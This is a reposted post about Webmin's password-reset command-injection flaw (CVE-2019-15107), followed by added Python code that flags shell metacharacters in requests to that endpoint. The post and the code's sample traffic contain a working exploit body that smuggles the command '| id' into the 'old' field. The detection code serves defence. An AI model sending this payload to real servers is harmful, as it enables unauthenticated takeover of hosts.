RT @shishi0_@twitter.com
"Webmin 0day remote code execution"
TL;DR: Lack of input validation in the reset password function allows RCE (CVE-2019-15107). Over 13 0000 vulnerable on Shodan.
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
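
For defenders, a detection sketch for the request shape in the post above. This is an added example, not part of the original post or of Webmin. It assumes you can see decoded POST bodies (for example at a reverse proxy or WAF log); the function names, the metacharacter set, and all sample requests except the body quoted in the post are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

TARGET = "/password_reset.cgi"  # endpoint named in the post
# Assumed policy for this example: characters with shell meaning are worth a
# look in any field sent to this endpoint. Real passwords can contain them,
# so treat hits as leads for review, not as confirmed exploitation.
SHELL_META = re.compile(r"[|;&`$<>\\\n\r]")


def suspicious_params(method, url, body):
    """Return sorted field names whose decoded value contains shell
    metacharacters, for POSTs to password_reset.cgi; otherwise []."""
    if method.upper() != "POST":
        return []
    # endswith() also matches installs served under a URL prefix.
    if not urlsplit(url).path.endswith(TARGET):
        return []
    # keep_blank_values keeps bare flags such as "pam" and "expired";
    # parse_qsl percent-decodes once, so %7C is seen as "|".
    fields = parse_qsl(body, keep_blank_values=True)
    return sorted({name for name, value in fields if SHELL_META.search(value)})


def scan(requests):
    """Return (index, flagged_fields) for every request that is flagged."""
    hits = []
    for i, (method, url, body) in enumerate(requests):
        flagged = suspicious_params(method, url, body)
        if flagged:
            hits.append((i, flagged))
    return hits


# Constructed sample traffic; entry 1 uses the body quoted in the post.
SAMPLE = [
    ("POST", "/password_reset.cgi", "user=alice&old=Summer2019&new1=Winter2019&new2=Winter2019"),
    ("POST", "/password_reset.cgi", "user=root&pam&expired&old=wrong | id"),
    ("POST", "/webmin/password_reset.cgi", "user=root&old=x%7Cid"),
    ("GET", "/password_reset.cgi", ""),
    ("POST", "/session_login.cgi", "user=bob&pass=a|b"),
]

if __name__ == "__main__":
    for index, names in scan(SAMPLE):
        print(f"request {index}: review fields {names}")
```
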